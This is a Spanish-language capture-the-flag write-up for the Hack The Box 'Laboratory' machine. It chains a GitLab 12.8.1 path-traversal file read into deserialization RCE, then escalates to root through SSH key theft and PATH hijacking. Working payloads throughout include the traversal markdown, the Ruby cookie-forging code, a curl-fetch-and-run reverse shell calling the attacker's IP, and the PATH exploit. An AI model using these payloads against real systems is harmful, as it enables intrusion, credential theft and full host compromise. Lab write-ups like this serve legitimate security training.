# Laboratory

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- GitLab - Arbitrary File Read
- GitLab - Remote Code Execution
- Docker GitLab image
- Git respositories
- Path variable priv escalation

## Nmap Scan

`nmap -v -p- -sV -sC -oN laboratory.txt 10.10.10.216`

```
Nmap scan report for 10.10.10.216
Host is up (0.067s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-05T10:39:28
| Not valid after:  2024-03-03T10:39:28
| MD5:   2873 91a5 5022 f323 4b95 df98 b61a eb6c
|_SHA-1: 0875 3a7e eef6 8f50 0349 510d 9fbf abc3 c70a a1ca
| tls-alpn: 
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

En el resultado del comando nmap podemos ver un nombre de dominio **laboratory.htb** y un subdominio **git.laboratory.htb** los cuales agregamos a nuestro archivo hosts.

```
10.10.10.216    laboratory.htb git.laboratory.htb
```

Accediendo a la página **https://laboratory.htb/** no se encuentra nada relevante sin embargo en la página **https://git.laboratory.htb/** podemos ver la aplicación **GitLab** que nos muestra un panel de inicio de sesión y de registro.

![1](img/1.png)

Nos creamos una cuenta y algo importante es que el correo debe tener el dominio **laboratory.htb** y se iniciara sesión automáticamente.

![2](img/2.png)

### GitLab - Arbitrary File Read

Estando dentro de la aplicación en el apartado de [help](https://git.laboratory.htb/help) podemos ver la versión de la aplicación **GitLab Community Edition 12.8.1**.

Investigando exploits públicos encontramos el siguiente [artículo](https://gitlab.com/gitlab-org/gitlab/-/issues/212175) que nos muestra una forma de leer archivos del sistema haciendo uso de la opción **issue**.

Creamos 2 proyectos.

![3](img/3.png)

Generamos un issue en el proyecto **test_1** con el payload correspondiente y le damos en el botón **Submit issue**.

```markdown
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
```

![4](img/4.png)

Nos vamos a la parte **Move issue**, seleccionamos el proyecto **test_2** y le damos al botón **Move**.

![5](img/5.png)

Veremos que ahora hay un archivo adjunto llamado passwd el cual podemos descargar.

![6](img/6.png)

El contenido efectivamente es del archivo passwd que está en el sistema.

![7](img/7.png)

### GitLab - Remote Code Execution

Leyendo un poco más el artículo anterior mencionan que es posible ejecución remota de código obteniendo primero el archivo **secrets.yml** y modificando el valor **secret_key_base** en nuestra propia instancia de GitLab para posteriormente generar nuestro payload serializado con **rails console**.

> It's possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default. \
    The can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then use the experimentation_subject_id cookie with a Marshalled payload. \
    A payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console

Repitiendo los pasos anteriores obtenemos el archivo **secrets.yml**.

```markdown
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
```

![8](img/8.png)

Para generar nuestra propia instancia de GitLab utilizaremos las imágenes de Docker y descargaremos la versión 12.8.1.

`docker pull gitlab/gitlab-ce:12.8.1-ce.0`

![9](img/9.png)

Corremos la imagen con Docker, podemos ver el archivo **secrets.yml.example** y al momento de ejecutar **gitlab-rails console** nos pide reconfigurar primero.

- `docker image ls`
- `docker run -it 719e7e45b1e2 bash`
- `gitlab-ctl reconfigure`

![10](img/10.png)

Cuando llegue a este punto se quedara esperando y solo le daremos **ctrl+c**.

![11](img/11.png)

Veremos que ahora podemos ejecutar correctamente el comando y se crea el archivo **secrets.yml** al cual le modificaremos el valor de **secret_key_base** solo comentando la linea y agregando la nueva variable.

- `gitlab-rails console`
- `cat /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml`

![12](img/12.png)

`nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml`

```
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
```

![13](img/13.png)

Entramos a **gitlab-rails console** y ejecutamos las siguientes líneas de código una por una y nos regresará la cookie que tendrá nuestra reverse shell.

```ruby
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_

erb = ERB.new("<%= `curl http://10.10.14.14/shell.sh -o /tmp/shell.sh && chmod 777 /tmp/shell.sh && bash /tmp/shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
```

![14](img/14.png)

Ya con nuestra cookie, ponemos a la escucha nuestro servidor web donde se encuentra el archivo **shell.sh** y nuestro netcat para recibir la shell. 

- `python3 -m http.server 80`
- `nc -lvnp 1234`
- `curl -k -v 'https://git.laboratory.htb/users/sign_in' -b 'experimentation_subject_id=<cookie>'`

![15](img/15.png)

## Escalada de Privilegios (User)

Después de enumerar nos encontramos con un repositorio interesante que contiene el **id_rsa** del usuario **dexter**.

- `git clone 19581e27de7ced00ff1ce50b2047e7a567c76b1cbaebabe5ef03f7c3017bb5b7.git`
- `cat 19581e27de7ced00ff1ce50b2047e7a567c76b1cbaebabe5ef03f7c3017bb5b7/dexter/.ssh/id_rsa`

![16](img/16.png)

Copiamos la llave y le damos permisos de lectura para posteriormente conectarnos por SSH.

- `chmod 400 id_rsa`
- `ssh -i id_rsa dexter@10.10.10.216`

![17](img/17.png)

## Escalada de Privilegios (Root)

Utilizando **linpeas** podemos ver un binario interesante **/usr/local/bin/docker-security** como **SUID**.

- `scp -i id_rsa /opt/Linux/linpeas.sh dexter@10.10.10.216:/tmp`
- `/tmp/linpeas.sh`

![18](img/18.png)

Al ejecutarlo no muestra nada, pasamos el binario a nuestra máquina para analizarlo y se puede ver que está ejecutando el comando **chmod**.

- `scp -i id_rsa dexter@10.10.10.216:/usr/local/bin/docker-security .`
- `strings docker-security`

![19](img/19.png)

### Path variable priv escalation

Podemos aprovecharnos de eso manipulando el **PATH** del binario.

Creamos nuestro archivo **chmod** que será suplantado por el original.

- `mkdir /tmp/doom`
- `echo '/bin/bash' > /tmp/doom/chmod`
- `chmod +x /tmp/doom/chmod`
- `which chmod`
- `export PATH=/tmp/doom:$PATH`

![20](img/20.png)

Vemos que se modificó correctamente la ruta del binario, procedemos a ejecutar el binario con permisos SUID para escalar privilegios.

`/usr/local/bin/docker-security`

![21](img/21.png)

## Referencias
https://gitlab.com/gitlab-org/gitlab/-/issues/212175 \
https://hub.docker.com/r/gitlab/gitlab-ce/tags?page=4&ordering=last_updated \
https://docs.gitlab.com/ee/administration/operations/rails_console.html \
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS \
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/